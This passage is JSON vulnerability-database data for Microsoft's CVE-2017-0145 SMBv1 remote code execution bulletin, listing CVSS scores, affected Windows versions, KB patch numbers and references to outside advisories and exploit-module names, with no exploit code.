"Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:48:04", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T19:05:15", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012215", "KB4012212", "KB4012598", "KB3210721", "KB3212646", "KB4012606", "KB4013198", "KBMS16-110, 3187754", "KB3210720", "KB4013429", "KB3205401", "KB3205409", "KB4012213", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:05:15", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T20:47:14", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB4014077", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service 